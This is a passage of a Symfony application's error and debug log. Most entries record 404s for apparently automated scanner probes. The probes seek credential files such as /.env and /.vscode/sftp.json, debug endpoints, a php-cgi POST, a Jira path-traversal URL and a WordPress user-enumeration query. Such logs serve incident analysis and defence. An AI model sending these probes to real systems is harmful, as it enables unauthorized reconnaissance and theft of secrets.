  5308. [2025-12-19 09:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5309. [2025-12-19 09:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5310. [2025-12-19 09:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5311. [2025-12-19 09:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5312. [2025-12-19 09:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5313. [2025-12-19 09:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5314. [2025-12-19 09:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5315. [2025-12-19 09:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5316. [2025-12-19 09:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5317. [2025-12-19 09:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5318. [2025-12-19 09:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5319. [2025-12-19 09:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5320. [2025-12-19 09:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5321. [2025-12-19 09:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5322. [2025-12-19 09:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5323. [2025-12-19 09:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5324. [2025-12-19 09:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5325. [2025-12-19 09:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5326. [2025-12-19 09:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5327. [2025-12-19 09:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5328. [2025-12-19 09:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5329. [2025-12-19 09:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5330. [2025-12-19 09:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5331. [2025-12-19 09:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5332. [2025-12-19 09:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5333. [2025-12-19 09:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5334. [2025-12-19 09:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5335. [2025-12-19 09:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5336. [2025-12-19 09:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5337. [2025-12-19 09:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5338. [2025-12-19 09:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5339. [2025-12-19 09:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5340. [2025-12-19 09:44:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5341. [2025-12-19 09:44:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5342. [2025-12-19 09:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5343. [2025-12-19 09:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5344. [2025-12-19 09:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5345. [2025-12-19 09:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5346. [2025-12-19 09:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5347. [2025-12-19 09:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5348. [2025-12-19 09:44:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  5349. [2025-12-19 09:44:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5350. [2025-12-19 09:44:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5351. [2025-12-19 09:44:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5352. [2025-12-19 09:44:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5353. [2025-12-19 09:44:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5354. [2025-12-19 09:44:49] security.DEBUG: Calling Authentication entry point. [] []
  5355. [2025-12-19 09:44:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
